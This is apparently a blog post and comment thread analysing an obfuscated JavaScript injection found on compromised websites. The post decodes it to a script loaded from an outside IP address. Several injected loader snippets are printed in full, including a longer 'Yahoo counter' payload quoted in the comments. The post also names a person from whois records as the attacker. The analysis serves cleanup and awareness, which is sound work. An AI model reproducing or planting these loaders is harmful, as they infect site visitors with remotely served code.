So a friend came to me today with a problem he was having and wasn’t sure what to do about…
Almost EVERY page on his webserver was going to a blank white page, or a page that was NOT what was intended to be viewed.
After looking into things, I realized we may have some foul play on our hands!
So somehow, this line of code was being inserted into almost every page on his entire hosting account.
<script language=javascript><!--
document.write(unescape('%3CGXscrLrGXirLpt%20VhsrcrL%3DSn%2FHY8%2F78
HY8%2EGX1GX1Cl60%2ECl61Cl67Cl65Cl6%2E24Vh9zAn%2FCl6jquVheHY8rrLyCl
6%2EjSns%3EGX%3C%2FGXszAnczAnrHY8iprLtzAn%3E').replace(/Cl6|HY8|zAn|Sn|
rL|Vh|GX/g,""));--></script>
Hmmmmmmmmmmmmm…..
My first clue was that this is using the javascript function unescape, which decodes an encoded string of text.
If you take the code and run it through a URL encoder, we end up with this:
<script language=javascript><!-- document.write(unescape('<GXscrLrGXirLpt VhsrcrL=Sn/HY8/78HY8.GX1GX1Cl60.Cl61Cl67Cl65Cl6.24Vh9zAn/Cl6jquVheHY8rrLyCl6.jSns>GX</GXszAnczAnrHY8iprLtzAn>').replace(/Cl6|HY8
|zAn|Sn|rL|Vh|GX/g,"")); --></script>
Next you can see at the end they are using javascript’s replace method which does just what it says, replaces characters with other characters. With this particular piece of code it is replacing Cl6, HY8, zAn, Sn, rL, Vh, and GX with nothing, essentially just removing the characters.
Once you remove those characters you end up with:
<script src=//78.110.175.249/jquery.js></script>
Doing a whois on that ip reveals:
person: Alexander A Solovyov
address: LIMT Group Ltd.
address: Karpinskogo 97a
address: Moscow
address: 111423
address: Russian Federation
phone: +7 342 2763167
e-mail: [email protected]
e-mail: [email protected]
e-mail: [email protected]
Sooooo it looks as if Mr. Solovyov has been inserting this piece of code into my friends page. Doing a simple google search for 78.110.175.249 or Alexander A Solovyov reveals that this guy enjoys doing this sort of thing.
Well if you go to 78.110.175.249/jquery.js you will see that it APPEARS to be a jquery file… HOWEVER…this is NOT what it is.
There is actually a hidden payload inside the jquery library he included which pulls in MORE escaped code from:
http://78.110.175.249/cp/?N
which looks like this:
_=0;for(i=0;i<9;i++){var d=document.getElementById("_"+i+"_");if(d)d.src=""}eval(unescape('~/`/~%4A~%75@%73t %66!u#c%6B%20@%6F@f~f%2E%2E%2E!?%3Cd@i#%76 %73$%74@%79%6C$e=#%64%69s%70`l%61y!:`%6E#o%6Ee~%3E|\n`va#r# t@%3Dn~e%77 @%44a@t%65|(%312!3%37|0`1%3759!2#0`%30$0`%29;#d$%6F`%63u`%6D!e|n|%74.~c!%6F%6F%6B%69e%3D%22h%67f%74=%31;` |e|xpi%72%65s~%3D"%2B~t.%74%6F!G~%4D~%54@%53%74r$i#%6E$g!%28)~+#%22`; ~pa%74|%68=/@%22@%3B\n@%2F%2F$%3C%2F`d|%69v%3E').replace(/@|\!|~|\?|#|\$|`|\|/g,""));
If we un-obfuscate this code we end up with:
//Just fuck off...<div style=display:none>
var t=new Date(1229972812000);document.cookie="hgft=1; expires="+t.toGMTString()+"; path=/";
//</div>
Which simply says “Just fuck off…” and then sets a cookie.
This luckily was not doing anything malicious, but COULD in the future (or could have in the past). He can change any of the code on his webserver to do whatever he wants…whenever he wants.
After digging a bit more, I realized that my friend was infected with a trojan on his personal computer, and the attacker had most likely obtained his webserver account login and accessed it that way.
I figured I would post this little “attack case study” to give anyone interested some insight on a simple attack. The best way to learn how to prevent these things is to be aware of them.
If you have ever been “hacked” or had your system exploited, leave a comment and let me know what you did to fix the situation, I’m curious to hear if many others have fallen prey like my friend did!
I’m having the same thing on my browser. I’m going to what should be an innocent site, but getting the 78.110.175.249/cp/?N “un-obfuscate” message from AVG. Haven’t figured how to get rid of it yet. I’ll get back with you.
To get rid of everything, you should just have to go into your webpages and remove the text that looks like what I have pasted at the top of this post.
I would also scan your system with a GOOD UPDATED antivirus program (get nod32 its the best) a couple of times to make sure you aren’t still infected by a trojan.
The other possibilitiy could be that he is getting in using exploits from common scripts like joomla or wordpress, etc. I would make sure any scripts being run on your webserver are fully updated.
Good luck!
The code retrieved from 78.110.175.249 is now 3272 lines after cleaning it up with the Javascript Beautifier. Its far beyond what I can comprehend, but I can send it to someone else for some light reading.
On the infection side of things, only .js, .html and .php files were targeted for injection. Most of the injected files were part of the FCKEditor package, meaning someone could have uploaded something through there that was not so nice.
You know, this kind of attack would work a lot better if they didn’t try so hard to obfuscate. The act of hiding makes it obvious that something is hidden. Put it in plain sight and its much harder to identify.
Here’s my story with this IP address.
So, I’m building a joomla website. I’m standing around at Best Buy looking at some Apple gear and took a peek at the site and it looked trashed — elements on the page were out of sorts and missing. Later, on a different machine, I noticed that it was connecting with “http://78.110.175.249/cp/a/?p” and the browser appeared to lockup. So I shut the computer down and started poking around for info on the IP address. Anyway, Spybot and AVG didn’t seem to find anything of importantance but get this… the site now appears to be fine on every computer but mine. At this moment the site won’t even open (for me) in Safari (just get a blank page) and FF and IE7 are placing the joomla modules incorrectly (for me). Every other website I hit seems just fine on this computer. And other computers seem to render the site fine (www.site.connexionscc.com).
I could understand my computer screwed aound with other pages or random pages but not just this particular site. Simply perplexing.
@Jay I took a glance at your source code and noticed this:
<!-- Yahoo! Counter startsif(typeof(yahoo_counter)!=typeof(1))eval(unescape('/#/#%3Cdi!%76%20s~%74y~l$%65%3D@%64~isp$%6C!%61%79:`n%6Fn%65%3E\n@%64&oc~%75m|%65%6E%74%2E#w%72@it%65("@%3C~%2Ft#%65xt#%61@%72e~%61%3E"%29!%3Bv~%61$%72%20!i~%2C|%5F,@a%3D`%5B"7~%38@%2E$%31~1%30`.$%31!%37%35.2@1"!,"1`%39%35%2E%32!%34@%2E&7%36|.2`%35%31$%22$%5D%3B%5F!%3D|%31;%69&f%28%64@%6Fcu%6D@%65nt.%63%6Fo@k@%69e$%2E%6D&at|%63$%68%28#%2F~%5C%62h@%67f%74|=$%31%2F%29!=@=`%6E%75%6C%6C%29%66%6Fr~%28%69=!%30&%3Bi%3C`2$%3B|%69%2B%2B#%29$%64%6F%63&u%6D@%65%6E&t`.@%77r#%69t$%65%28%22%3C&%73`c`%72i$%70%74$%3E%69#%66`(_@)@%64o%63`%75|%6D%65n#t@%2E%77&r%69%74%65(&%5C"`%3C~%73c%72i|p%74~%20@%69%64!%3D%5F!"+`%69%2B%22$%5F@%20sr$%63~=$%2F%2F%22&%2Ba|%5B&i@]%2B%22%2F`c!%70/&?%22&+@%6Ea@%76%69&g~%61%74!or.%61#pp#%4E%61m%65.|%63|h`%61~%72%41`%74%28%30#%29&+"%3E%3C#%5C!%5C#/~%73%63&r@i%70|t%3E%5C%22$%29%3C@%5C|/s%63r#i%70|%74%3E`%22%29#%3B\n&/|%2F%3C`/%64@i%76%3E').replace(/\!|\||~|@|`|#|\&|\$/g,""));var yahoo_counter=1;
<!-- counter end -->
This looks like the same sort of thing as what my friend was infected with, but possibly more serious. You should make sure to get that removed from your site right away. It appears that it is in the footer of your site. From the little bit of research I did on this “yahoo counter” script injection it appears that many users had reported virus’s being automatically downloaded to their computers when they visited the site.
I was infected too! Probably cause an virus on my local PC (wich i used for uploading). I informed my ISP (in the Netherlands):
http://forum.antagonist.nl/viewtopic.php?f=7&t=5938
After this infection i got the virus warning on a file: setup_u.exe on my local pc. This was AFTER my website was infected and I visited it…
So probably now the script is infecting other PC’s throug my/our website…
Note that some malwares directly inject javascript on the machine, by looking at html, php, asp files on the machine. they don’t even need your website credentials, as YOU will upload the infected pages yourself..
my two cents.
I too have been infected with this, I had just launched my membership when I had an exploit 2 days later.
I found a config.php file in my root folder of my host with 777 permissions – I removed it and later found I had a trojan on my PC.
I am fairly green when it comes to computers so I could be a little slow in picking these things up.
I find now when I click on pages in my nav bar from my index.php the page is directed to 78.110.175.249 it seems to site there for some time and then moves on to open the original page that was intended.
I am hoping I have foiled it my initially removing the suspect config.php file – but am just not sure.
My original exploit was 13/03
Any suggestions – this is my first venture into website building.
Your problem is that there is javascript inserted into your documents. I went into just one page and found this directly underneath the tag:
<script language=javascript><!--
document.write(unescape('%3CRAGsc9v8r9v8iRAGpt%20srRu0c
%3D%2F %2Fyc7jEP8%2E19v810%2EjEP1jEP759v8%2E29v849KKa
%2FjEPjRu0qKMdu9v8ejEPr9v8y9v8%2EKMdjs%3E%3C9v8%2F9v8
scjEPryciKKaptRAG%3E').replace(/yc|RAG|KMd|jEP|Ru0|KKa|9v8/
g,"")); --></script>
This is definitely something malicious. You need to remove that from every and any page it is on in your website. It is good you changed the 777 permissions but I am pretty sure this happened from the trojan you had on your computer. Make sure to remove that code from your pages and remove that trojan from your computer, then change all your passwords.
Has anyone figured out how this guy is getting into systems?
Forgot to add…in our case, he hit files/folders that had not been touched in 4 years, so i know it wasn’t infected code uploaded from user machines. Could it be an exploit in front page extensions?
My guess is he got in to your hosting account/server and just ran a script to scan for certain files he is interested in and inserts the malicious code.
Very intersting…nobody suggested here how to remove this…please give a proper suggestion if anyone removed this